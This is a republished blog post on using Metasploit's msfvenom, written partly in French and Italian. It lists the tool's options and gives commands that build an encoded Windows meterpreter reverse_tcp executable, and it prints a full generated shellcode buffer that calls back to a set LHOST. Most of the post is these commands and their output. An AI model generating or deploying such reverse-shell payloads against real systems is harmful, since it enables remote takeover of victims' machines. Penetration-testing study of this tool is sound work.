• 神器metasploit中Msfvenom 的用法(外文翻译转)


    Options:
        -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
        -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
        -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
        -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
        -e, --encoder    [encoder]       The encoder to use
        -a, --arch       [architecture]  The architecture to use
            --platform   [platform]
                                         The platform of the payload
        -s, --space      [length]        The maximum size of the resulting payload
        -b, --bad-chars  [list]          The list of characters to avoid example: 'x00xff'
        -i, --iterations [count]         The number of times to encode the payload
        -x, --template   [path]          Specify a custom executable file to use as a template
        -k, --keep                       Preserve the template behavior and inject the payload as a new thread
        -h, --help                       Show this message
    msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT DE SORTIE> > nomdefichier
    eg:
    msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=<NOTRE IP> | msfvenom -e x86/shikata_ga_nai -a x86 –platform windows -f exe > meter.exe


    Sul sito Rapid7 è stato anche fatto un esempio dell’uso dello script, ovvero la creazione di un payload (reverse_tcp):

    fahrenheit:msf3 bannedit$ msfvenom -p windows/meterpreter/reverse_tcp -f ruby -e -i 3 -s 480 LHOST=192.168.0.120
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    buf =
    "xd9xf7xd9x74x24xf4xbbx9cxecxeax8ax5fx2bxc9"+
    "xb1x50x31x5fx18x03x5fx18x83xefx60x0ex1fx31"+
    "x11xe0xa4x2axfbx23xfdxc7xdfx2fxa4x16xd6x61"+
    "x10x68xb2x95x20x60xbex95x7cx65x55x40x38x01"+
    "x4bx51x78x5fx1fx36xdex3bx99x8cxb2x11xb3x8d"+
    "x2dx4cx66x7cxbdx02x0bxa6xa9x1ax32x65xcfx75"+
    "xe8x15x1ax62x5fx69xe1xddx90x2ex2ex40xe0xb7"+
    "x8bx16xfex15xdcx34x4cx4ex18x18x03x46x22xff"+
    "xa8x9bxf0xd5x4fxe0xfdxabx71x6ex43x03xd5x28"+
    "x07x29x5exadx8fxd8xafxbdx69x06xf1xd1x4ex9b"+
    "x01x7dx5ax75x54x76x90xdbx5ex7bx97x37xa4xab"+
    "x2dxe2x17x8excfx4bxd0x3fxefxc6xffxe5x1cxc3"+
    "x99x04x15x2excex5ex16x86x5ax2fx62x0ax32xe5"+
    "xe1xa4xd3x32x92x13xfdxcfxb6xa2x8bx97xcexf8"+
    "x27x12xb0x6fxb5xa8x91x30x2cx14x40x2fx43xd8"+
    "x45x46xd0x4cx58x59x8dx78x47xb2xdax79x6cxfa"+
    "x07x43x18xc4x07x0ex2fxd0x71x84xcbx1cxabx01"+
    "xb0x17xedx07x1bxb0xcfxd1x25xc1x9bx62x7cxac"+
    "x43x2ex52x36xb1xfcx61xbcx0ex56xdcxe1x9dxc2"+
    "x29x3fxe9xf3xb1xe2x72x77x99x4bxf3xfcx83xd2"+
    "x19x6dx53x4cx64xa0xddx38x82x3dx15x66x38x96"+
    "x39xb3xa4xe3xffx07xb7x8ax23xcaxc6xafx57x64"+
    "x3dxf3x23x63x42x30x90x3bx67x26x81x24x61xc3"+
    "xe4x51x75x30x47xf8x15xcbx21xe9x2ax30x9dx04"+
    "x28xe3x37xb0xa4xaax1exf3"

    Questo crea un payload in formato ruby, con l’encoder shikata_ga_nai, scelto automaticamente dal rank degli encoder, -s 480 indica che l’output non deve essere maggiore di 480 byte e in fineLHOST=192.168.0.120 setta la variabile LHOST per usarla con il Payload .

    Ci viene fatto anche un confronto sotto l’aspetto della velocità d’esecuzione .
    Il primo esempio mostra il tempo di esecuzione di Msfvenom, mentre il secondo quello di msfpayload emsfencode insieme:

    fahrenheit:msf3 bannedit$ time ./msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.0.120 -f ruby 1> /dev/null
    [*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
    real    0m2.744s
    user    0m2.380s
    sys    0m0.367s
    fahrenheit:msf3 bannedit$ time ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.120 R|./msfencode -c 3 1> /dev/null
    [*] x86/shikata_ga_nai succeeded with size 321 (iteration=1)
    [*] x86/shikata_ga_nai succeeded with size 348 (iteration=2)
    [*] x86/shikata_ga_nai succeeded with size 375 (iteration=3)
    real    0m3.070s
    user    0m4.227s
    sys    0m0.778s

  • 相关阅读:
    (暂时弃坑)(半成品)ACM数论之旅18---反演定理 第二回 Mobius反演(莫比乌斯反演)((づ ̄3 ̄)づ天才第一步,雀。。。。)
    ACM数论之旅17---反演定理 第一回 二项式反演(神说要有光 于是就有了光(´・ω・`))
    ACM数论之旅16---母函数(又名生成函数)(痛并快乐着(╭ ̄3 ̄)╭)
    (暂时弃坑)ACM数论之旅15---置换群与Polya定理(我把标题看成poi了,poipoipoi(*≧▽≦)ツ)
    ACM数论之旅14---抽屉原理,鸽巢原理,球盒原理(叫法不一又有什么关系呢╮(╯▽╰)╭)
    ACM数论之旅13---容斥原理(一切都是命运石之门的选择(=゚ω゚)ノ)
    ACM数论之旅12---康托展开((*゚▽゚*)装甲展开,主推进器启动,倒计时3,2,1......)
    还有哪些东西要写눈_눈
    ACM数论之旅11---浅谈指数与对数(长篇)(今天休息,不学太难的数论> 3<)
    ACM数论之旅10---大组合数-卢卡斯定理(在下卢卡斯,你是我的Master吗?(。-`ω´-) )
  • 原文地址:https://www.cnblogs.com/demonspider/p/2738707.html
Copyright © 2020-2023  润新知